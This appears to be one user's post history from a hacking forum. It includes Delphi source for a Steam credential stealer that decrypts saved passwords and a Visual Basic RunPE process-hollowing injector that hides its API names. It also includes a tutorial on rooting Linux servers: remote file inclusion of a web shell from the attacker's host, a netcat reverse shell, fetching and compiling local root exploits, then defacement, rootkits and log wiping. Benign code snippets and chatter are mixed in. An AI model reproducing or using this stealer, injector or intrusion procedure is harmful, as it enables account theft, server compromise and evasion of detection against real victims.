Everything posted by Nytro
-
White Hat Hacking course, part 1: http://www.tudy.ro/2008/11/15/white-hat-hacking-course-part-1/ White Hat Hacking course, part 2: http://www.tudy.ro/2008/11/24/white-hat-hacking-part-2/ White Hat Hacking, part 3: http://www.tudy.ro/2008/12/05/white-hat-hacking-part-3/
-
by -bRx- Function UltimoNickUsadoInGame:String; = latest nick in game Function UserCounterStrikeRate:String; = latest rate set by user Function DiretorioDaSteam:String; = steam directory Function DiretorioDoExecutavelSteam:String; = exe steam dir Function ConfiguracaoDeIdioma:String; = language Function EnviarDadosSTEAM:String; all results in this function {********************************************************************************************* *-----------=*@@=------------------*@@*.----------------------------------------------------* *----------.@@@@@@@%-.-------------@@@@@@@#=------------- ::--------@#-.--------------------* *-----------=@@@*-@@@@@@@@#:---------@@@@#@@@@@#+: -----@@@@#------@@@@=--------------------* *------------#@@@----- :-%@@@@--------@@@=---#%@@@@-- =@@@@@@@:---#@@@+---------------------* *- .:- ---@@@#-------:@@@%---------+@@*----*@@@%@@@@@@@*@@@%-+@@@*------- .:-:------* *@@@@@@@@@=----@@@ ----*@@@@%#@@@@@@@@#:#@@#:@@@@@@@#-@@@%-- @@@@@@@--------@@@@@@@@@@------* *#%%@@@#*------=@@%--@@@@@@@@@@@%#%@@@@@@@@@@@@@@+.--*@@*----- @@@@@ -------*%@%@@%#+-------* *---------------@@@@@@@@@#-.---------=@@@@@@@@.-----#@@*------=@@@@@@@.---------------------* *-------------+@@@@@%: ---------------@@@@+@@@------@@@------*@@@: @@@@#--------------------* *------------.#+.@@@*-----------------@@@@-=@@%----@@@------+@@@-----@@@@+------------------* *----------------=@@@----------------%@@@ --#=.---+@@+------@@@+------#@@@@.----------------* *----------------.@@@--------------*@@@@----------@@@-----:@@@#-------- @@@@#---------------* *-----------------#- --------- -%@@@@%:-----------@@%------@@@------+#@@@@@@@@+-------------* *--------------.-=:.:-=+*%@@@@@@@@#---------------@@%---------------@@@@%*=-:::-------------* *--------------- .-=**%%%%#*+:.-------------------@@@----------------- ---------------------* *-------------------------------------------------.@@ --------------------------------------* 
********************************************************************************************* Author: counterstrikewi and -bRx- please give credits case of use it } unit SteamStealerUnitBybRx; interface uses Windows, CompressionStreamUnit; type LongRec = packed record case Integer of 0: (Lo, Hi: Word); 1: (Words: array [0..1] of Word); 2: (Bytes: array [0..3] of Byte); end; { TStringStream } TStringStream = class(TStream) private FDataString: string; FPosition: Integer; protected procedure SetSize(NewSize: Longint); override; public constructor Create(const AString: string); function Read(var Buffer; Count: Longint): Longint; override; function ReadString(Count: Longint): string; function Seek(Offset: Longint; Origin: Word): Longint; override; function Write(const Buffer; Count: Longint): Longint; override; procedure WriteString(const AString: string); property DataString: string read FDataString; end; const { File open modes } {$IFDEF LINUX} fmOpenRead = O_RDONLY; fmOpenWrite = O_WRONLY; fmOpenReadWrite = O_RDWR; // fmShareCompat not supported fmShareExclusive = $0010; fmShareDenyWrite = $0020; // fmShareDenyRead not supported fmShareDenyNone = $0030; {$ENDIF} {$IFDEF MSWINDOWS} fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000 platform; // DOS compatibility mode is not portable fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030 platform; // write-only not supported on all platforms fmShareDenyNone = $0040; {$ENDIF} function SteamUserName : String; function SteamPassword : String; Function UltimoNickUsadoInGame:string; Function UserCounterStrikeRate:string; Function DiretorioDaSteam:string; Function DiretorioDoExecutavelSteam:string; Function ConfiguracaoDeIdioma:string; Function EnviarDadosSTEAM:string; type TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; 
cdecl; var SteamPath : String; StringStream : TStringStream; FileStream : TFileStream; I : Integer; UserName : PChar; EncryptedPassword : PChar; DecryptionKey : TSteamDecryptDataForThisMachine; PasswordLength : UINT; Password : array[0..99] of char; implementation function PegaValor( const Key: HKEY; const Chave, Valor: String ) : String; var handle : HKEY; Tipo, Tam : Cardinal; Buffer : String; begin RegOpenKeyEx( Key, PChar( Chave ),0, KEY_ALL_ACCESS, handle ); Tipo := REG_NONE; RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,nil,@Tam ); SetString(Buffer, nil, Tam); RegQueryValueEx( Handle,PChar( Valor ),nil,@Tipo,PByte(PChar(Buffer)),@Tam ); Result := PChar(Buffer); RegCloseKey( handle ); Result := PChar(Buffer); end; procedure FreeAndNil(var Obj); var Temp: TObject; begin Temp := TObject(Obj); Pointer(Obj) := nil; Temp.Free; end; { TStringStream } constructor TStringStream.Create(const AString: string); begin inherited Create; FDataString := AString; end; function TStringStream.Read(var Buffer; Count: Longint): Longint; begin Result := Length(FDataString) - FPosition; if Result > Count then Result := Count; Move(PChar(@FDataString[FPosition + 1])^, Buffer, Result); Inc(FPosition, Result); end; function TStringStream.Write(const Buffer; Count: Longint): Longint; begin Result := Count; SetLength(FDataString, (FPosition + Result)); Move(Buffer, PChar(@FDataString[FPosition + 1])^, Result); Inc(FPosition, Result); end; function TStringStream.Seek(Offset: Longint; Origin: Word): Longint; begin case Origin of soFromBeginning: FPosition := Offset; soFromCurrent: FPosition := FPosition + Offset; soFromEnd: FPosition := Length(FDataString) - Offset; end; if FPosition > Length(FDataString) then FPosition := Length(FDataString) else if FPosition < 0 then FPosition := 0; Result := FPosition; end; function TStringStream.ReadString(Count: Longint): string; var Len: Integer; begin Len := Length(FDataString) - FPosition; if Len > Count then Len := Count; SetString(Result, 
PChar(@FDataString[FPosition + 1]), Len); Inc(FPosition, Len); end; procedure TStringStream.WriteString(const AString: string); begin Write(PChar(AString)^, Length(AString)); end; procedure TStringStream.SetSize(NewSize: Longint); begin SetLength(FDataString, NewSize); if FPosition > NewSize then FPosition := NewSize; end; function StrLen(const Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function FileAge(const FileName: string): Integer; {$IFDEF MSWINDOWS} var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; {$ENDIF} {$IFDEF LINUX} var st: TStatBuf; begin if stat(PChar(FileName), st) = 0 then Result := st.st_mtime else Result := -1; end; {$ENDIF} function FileExists(const FileName: string): Boolean; {$IFDEF MSWINDOWS} begin Result := FileAge(FileName) <> -1; end; {$ENDIF} {$IFDEF LINUX} begin Result := euidaccess(PChar(FileName), F_OK) = 0; end; {$ENDIF} // Senha:=PegaValor(HKEY_LOCAL_MACHINE,'Software\Vitalwerks\DUC','Password'); function SteamUserName : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates UserName within the SteamAppData.vdf file FileStream := TFileStream.Create(SteamPath+'\config\SteamAppData.vdf',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('AutoLoginUser',StringStream.DataString); I := I + 17; UserName := 
PChar(copy(StringStream.DataString,I,Pos('"',copy(StringStream.DataString,I,100))-1)); FreeandNil(StringStream); Result := UserName; except Result := 'Error'; end; end; function SteamPassword : String; begin try SteamPath := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); //Locates Encrypted Password within the ClientRegistry.blob file if not FileExists(SteamPath+'/ClientRegistry.Blob') then begin Result := 'Não foi possível encontrar o arquivo necessário para pegar o password.' ;Exit; end else begin FileStream := TFileStream.Create(SteamPath+'\ClientRegistry.blob',fmOpenRead); StringStream := TStringStream.Create(''); StringStream.CopyFrom(FileStream, FileStream.Size); FreeandNil(FileStream); I := Pos('Phrase',StringStream.DataString); I := I + 40; EncryptedPassword := PChar(copy(StringStream.DataString,I,255)); FreeandNil(StringStream); //Uses SteamDecryptDataForThisMachine function from Steam.dll to decrypt password DecryptionKey := GetProcAddress(LoadLibrary(PChar(SteamPath+'\steam.dll')),'SteamDecryptDataForThisMachine'); DecryptionKey(EncryptedPassword, strlen(EncryptedPassword),@Password, 100,@PasswordLength); Result := Password; end; except Result := 'Error'; end; end; Function UltimoNickUsadoInGame:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','LastGameNameUsed'); End; Function UserCounterStrikeRate:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Rate'); End; Function DiretorioDaSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamPath'); End; Function DiretorioDoExecutavelSteam:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','SteamExe'); End; Function ConfiguracaoDeIdioma:string; Begin Result := PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); End; Function EncontrouSteam:Boolean; var VerificaString:string; Begin Result := False; VerificaString := 
PegaValor(HKEY_CURRENT_USER,'Software\Valve\Steam\','Language'); if VerificaString<>'' then Result := True else Result := False; End; Function EnviarDadosSTEAM:string; var Enter:string; Begin Enter := #13#10; if EncontrouSteam then begin Result := 'Login: '+SteamUserName + Enter + 'Senha: '+SteamPassword + Enter + 'Ultimo Nick usado: '+UltimoNickUsadoInGame + Enter + 'Rate do Usuário: ' +UserCounterStrikeRate + Enter + 'Diretório da Steam: '+DiretorioDaSteam + Enter + 'Diretório do Executavel Steam: '+DiretorioDoExecutavelSteam + Enter + 'Configuração de Idioma do Usuário: '+ConfiguracaoDeIdioma + Enter ; end else Result := 'Não foi possível encontrar os dados. Possíveis causas: Diretório da steam ou DLL não encontrada, ou talvez o arquivo esteja sendo usada por outro processo'; end; end. Download: http://www.2shared.com/file/7117962/32213e20/SteamStealer.html
-
by mjrod5: You can flame me or whatever you want... Here is code i made =) Seems like delphi doesnt support invoke, only call xP Have fun doing nothing with this program InlineASM; uses Windows; var _msg: String = 'Inline ASM, Delphi'; _cpt: String = 'woot!'; begin asm //MessageBox: function(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; push 0 //uType push _cpt //lpCaption push _msg //lpText push 0 //hWnd call messagebox //Call the MessageBoxAPI with params you pushed //Delphi Equivalent would be //MessageBox(0,PChar(_msg),PChar(_cpt),0); end; end.
-
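' Win32 import: fills an OSVERSIONINFO record with the version of the running OS.
' Returns non-zero on success and 0 on failure.
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

' Basic version record passed to GetVersionExA.
Private Type OSVERSIONINFO
    OSVersionInfoSize As Long       ' must hold Len(record) before the call
    MajorVersion As Long
    MinorVersion As Long
    BuildNumber As Long
    PlatformId As Long              ' 1 = Win9x family, 2 = NT family
    szCSDVersion As String * 128
End Type

' Extended version record. Declared here but not used by GetWindowsVersion.
Private Type OSVERSIONINFOEX
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
    wServicePackMajor As Integer
    wServicePackMinor As Integer
    wSuiteMask As Integer
    wProductType As Byte
    wReserved As Byte
End Type

' Returns a short display name for the running Windows release, or "Unknown"
' when the API call fails or the version is not in the table below.
'
' The lookup key is "PlatformId.MajorVersion.MinorVersion".
'
' NOTE: GetVersionEx is deprecated. On Windows 8.1 and later, a process without
' a matching compatibility manifest is told it runs on version 6.2, so the value
' is only a display hint. Do not base patch-level or other security decisions
' on it.
Public Function GetWindowsVersion() As String
    Dim OS As OSVERSIONINFO
    Dim callResult As Long
    Dim version As String

    GetWindowsVersion = "Unknown"

    OS.OSVersionInfoSize = Len(OS)
    callResult = GetVersionEx(OS)

    ' A zero return means the record was not filled in; do not interpret it.
    If callResult = 0 Then Exit Function

    version = OS.PlatformId & "." & OS.MajorVersion & "." & OS.MinorVersion

    Select Case version
        Case "1.4.0"
            GetWindowsVersion = "Win 95"
        Case "1.4.10"
            GetWindowsVersion = "Win 98"
        Case "1.4.90"
            ' Windows ME reports 4.90; the original key "1.4.98" could never match.
            GetWindowsVersion = "Win ME"
        Case "2.3.51"
            GetWindowsVersion = "Win NT 3"
        Case "2.4.0"
            GetWindowsVersion = "Win NT 4"
        Case "2.5.0"
            GetWindowsVersion = "Win 2000"
        Case "2.5.1"
            GetWindowsVersion = "Win XP"
        Case "2.6.0"
            GetWindowsVersion = "Win Vista"
        Case "2.6.1"
            GetWindowsVersion = "Win Seven"
        Case Else
            GetWindowsVersion = "Unknown"
    End Select
End Function

' Demo entry point: shows the detected version when the form loads.
Private Sub Form_Load()
    MsgBox GetWindowsVersion()
End Sub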
-
DIE (Detect it Easy) detects most common packers, cryptors and compilers for PE files. Download: http://www.2shared.com/file/7117852/18ce07d4/Detect_it_easy.html
-
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH Mail/MSN: admin@cyberanarchy.org / anasa_staxth@hotmail.com For Cyber Anarchy (Nov. 2007) ----------------------------------------------------------------------- You will need: - Vulnerable Site in R.F.I. - Shell for R.F.I. (e.g. c99, r57 or other) - NetCat - Local Root Exploit (depending on the kernel and the version) This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF. Suppose that we have found a site with R.F.I. vulnerability: http://www.hackedsite.com/folder/index.html?page= e can run shell exploiting Remote File Inclusion, as follows: http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells) After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname - a in Command line. To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell. We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57). Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way: We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port. We press in Windows Start -> Run -> and we type: cmd After we will go to the NetCat directory: e.g. 
cd C:\Program Files\Netcat And we type the following command: nc -n -l -v -p 11457 NetCat respond: listening on [any] 11457 ... In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic) In the Port form we will put the port that we opened and NetCat listens. If we press connect the shell will respond: Now script try connect to <IP here> port 11457 ... If our settings are correct NetCat will give us a shell to the server Now we wil continue to the Rooting proccess. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions. List of the exploits/kernel: 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit. 
Some sites that we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel") Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin' you can find 'em all We can find writable folders/files by typing: find / -perm -2 -ls We can use the /tmp folder which is a standard writable folder We type: cd /tmp To download the local root exploit we can use a download command for linux like wget. For example: wget http://www.arblan.com/localroot/h00lyshit.c where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit. After the download we must compile the exploit (Read the instruction of the exploit before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit Now we have created the executable file: h00lyshit. The command to run this exploit is: ./h00lyshit <very big file on the disk> We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. We must wait 2-3 minutes for the file creation If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>
-
Ultrasurf V9.5 (100% Anonymous Surfing!)

Privacy: Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ...

Security: Completely transparent data transfer and high-level encryption of the content allow you to surf the web with high security.

Freedom: UltraSurf allows you to overcome censorship and blocking on the Internet. You can browse any website freely, so as to obtain true information from the free world.

With this program you can change Internet Explorer's proxy settings and reach pages that computer administrators have blocked, for example at schools, libraries and similar places. To use it, open the program and wait until it reports "Successfully connected to server!", then open Internet Explorer and go to any page you want, including the blocked ones. You can also use it as a normal proxy server in Internet Explorer to surf 100% anonymously online.

Download: http://www.mediafire.com/download.php?jyjtymyjyvm
-
Cine are chmod 777, folderul in care se afla toate fisierele?
-
Da, ea e, am fost la un concurs in Tg. Jiu si a fost si ea.
-
by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : This is gonna be a looong list xD ' Batfitch - kernel base asm ' Karcrack - For helping me to debug and test it ' Paul Caton - vTable patch examples ' rm_code - First call api prototype ' and different books and pappers ' ' Compile : P-Code !!! ' ' Comments : Coded on top of the invoke module. ' ' History : 30/06/2009 First Cut.................................................... ' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........ 
'--------------------------------------------------------------------------------------- Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_EXPORT_DIRECTORY As Long = &H28 Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28 Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3" Private Const PATCH1 As String = "<PATCH1>" Private Const PATCH2 As String = "<PATCH2>" Private Const CONTEXT_FULL As Long = &H10007 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type 
IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type 
IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Private c_lKrnl As Long Private c_lLoadLib As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Public Function zDoNotCall() As Long 'This function will be replaced with machine code laterz 'Do not add any public procedure on top of it End Function Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean Dim i As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tCONTEXT As CONTEXT Dim lKernel As Long Dim lNTDll As Long Dim lMod As Long If Not c_bInit Then Exit Function Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If 'kernel32 lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC 'ntdll lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC If sHost = vbNullString Then sHost = Space(260) 'GetModuleFileNameW lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC Invoke lMod, App.hInstance, StrPtr(sHost), 260 End If With tIMAGE_NT_HEADERS.OptionalHeader tSTARTUPINFO.cb = Len(tSTARTUPINFO) 'CreateProcessW lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC Invoke lMod, 0, 
StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION) 'NtUnmapViewOfSection lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase 'VirtualAllocEx lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0 For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i tCONTEXT.ContextFlags = CONTEXT_FULL 'NtGetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0 tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint 'NtSetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtResumeThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, 0 hProc = tPROCESS_INFORMATION.hProcess End With RunPE = True End Function Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr 
As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property 